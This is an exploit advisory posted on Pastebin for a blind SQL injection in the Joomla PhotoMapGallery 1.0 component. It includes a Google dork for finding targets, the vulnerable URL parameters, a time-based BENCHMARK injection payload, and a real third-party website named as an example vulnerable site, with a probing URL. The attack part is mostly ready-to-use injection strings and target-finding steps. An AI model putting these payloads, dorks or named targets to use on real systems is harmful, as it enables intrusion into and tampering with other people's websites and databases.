Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla PhotoMapGallery Components 1.0 Blind SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/02/2019
- # Vendor Homepage : joomla.org
- # Software Download Link : hotjoomlatemplates.com/joomla-extensions/55-hot-photo-gallery-plugin-for-joomla
- # Software Information Link : extensions.joomla.org/extensions/photos-a-images/photo-gallery/
- # Software Version : 1.0
- # Software Price : 15$
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Low
- # Google Dorks : inurl:''/index.php?option=com_photomapgallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Joomla Gallery plugin - Hot Photo Gallery is all that you need to make Photo Galleries
- of images directly in content pages of your Joomla website! This Joomla gallery plugin
- creates thumbnail images and slide show automatically from your collection of photos.
- ####################################################################
- # Impact :
- ***********
- Joomla PhotoMapGallery 1.0 component for Joomla is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied
- data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_photomapgallery&view=imagehandler&folder=[SQL Injection]
- /index.php?option=com_photomapgallery&view=photogallery&id=[ID-NUMBER]:[FOLDER-NAME-HERE]&Itemid=[SQL Injection]
- /index.php?option=com_photomapgallery&view=photogallery&id=[ID-NUMBER]:giratoire-rc1a-commune-de-crans-pres-celigny-2007&Itemid=[SQL Injection]
- # Example SQL Injection Exploit Payload :
- ************************************
- -1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] schenksa.ch/index.php?option=com_photomapgallery
- &view=photogallery&id=3:giratoire-rc1a-commune-de-crans-pres-celigny-2007&Itemid=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- No valid database connection You have an error in your SQL syntax; check the
- manual that corresponds to your MySQL server version for the right syntax to
- use near 'AND i.ordering <= AND i.published = 1 ORDER BY i.ordering
- DESC' at line 1 SQL=SELECT count(i.id) FROM jos_g_galleryitems AS
- i LEFT JOIN jos_g_cats_item_relations AS rel ON rel.itemid = i.id LEFT
- JOIN jos_g_categories AS c ON c.id = rel.catid WHERE c.id =
- AND i.ordering <= AND i.published = 1 ORDER BY i.ordering DESC
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment